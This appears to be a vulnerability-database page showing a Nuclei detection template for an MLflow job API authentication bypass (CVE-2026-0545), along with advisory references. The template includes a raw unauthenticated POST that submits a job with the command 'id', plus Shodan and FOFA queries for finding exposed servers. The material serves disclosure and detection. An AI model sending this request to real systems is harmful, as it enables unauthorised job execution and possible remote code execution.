Lucene search
K

MLflow Job API - Authentication Bypass

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

MLflow authentication bypass via unprotected /ajax-api/3.0/jobs allowing unauthenticated submissions.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-0545
3 Apr 202617:03
attackerkb
Huntr
Job API exposed without authorization
27 Dec 202517:02
huntr
Chainguard
CVE-2026-0545 vulnerabilities
10 Apr 202602:13
cgr
Circl
CVE-2026-0545
3 Apr 202618:55
circl
CNNVD
MLflow 访问控制错误漏洞
3 Apr 202600:00
cnnvd
CVE
CVE-2026-0545
3 Apr 202617:03
cve
Cvelist
CVE-2026-0545 Missing Authentication for Critical Function in mlflow/mlflow
3 Apr 202617:03
cvelist
EUVD
EUVD-2026-18809
3 Apr 202618:31
euvd
Github Security Blog
mlflow: FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization
3 Apr 202618:31
github
NVD
CVE-2026-0545
3 Apr 202618:16
nvd
Rows per page
id: CVE-2026-0545

info:
  name: MLflow Job API - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    MLflow latest version contains an authentication bypass caused by unprotected FastAPI job endpoints under /ajax-api/3.0/jobs/* when basic-auth is enabled, letting unauthenticated network clients submit and manage jobs, exploit requires job execution enabled and allowlisted job functions.
  impact: |
    Unauthenticated attackers can execute jobs remotely, potentially leading to remote code execution, denial of service, or data exposure.
  remediation: |
    Update to the latest version with fixed authentication enforcement on job endpoints.
  reference:
    - https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0545
    - https://github.com/mlflow/mlflow
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-0545
    epss-score: 0.04392
    epss-percentile: 0.90136
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: mlflow
    product: mlflow
    shodan-query: title:"MLflow"
    fofa-query: title="MLflow"
  tags: cve,cve2026,mlflow,auth-bypass

http:
  - raw:
      - |
        POST /ajax-api/3.0/jobs/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"job_name":"run_task","params":{"command":"id"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "\"job_id\":", "\"job_name\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206857d11489d19a7fe7583a741bd12c5a899545075ee05ec6dc565d70ef560a70022010a52215699e1b6b300bb502d31fbfe2f81a22f5366fe56b5aaaab84aaffe6dc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2026 12:57Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.1 - 9.8
CVSS 39.1
EPSS0.04392
SSVC
31